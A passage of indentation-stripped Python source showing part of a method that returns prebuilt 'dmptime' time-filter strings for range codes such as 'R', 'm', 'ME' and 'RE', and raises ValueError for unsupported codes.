'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._dmptime_range_filter_str
elif range_larger_smaller == 'm':
return self._dmptime_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._dmptime_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._dmptime_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._dmptime_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._dmptime_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._dmptime_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
|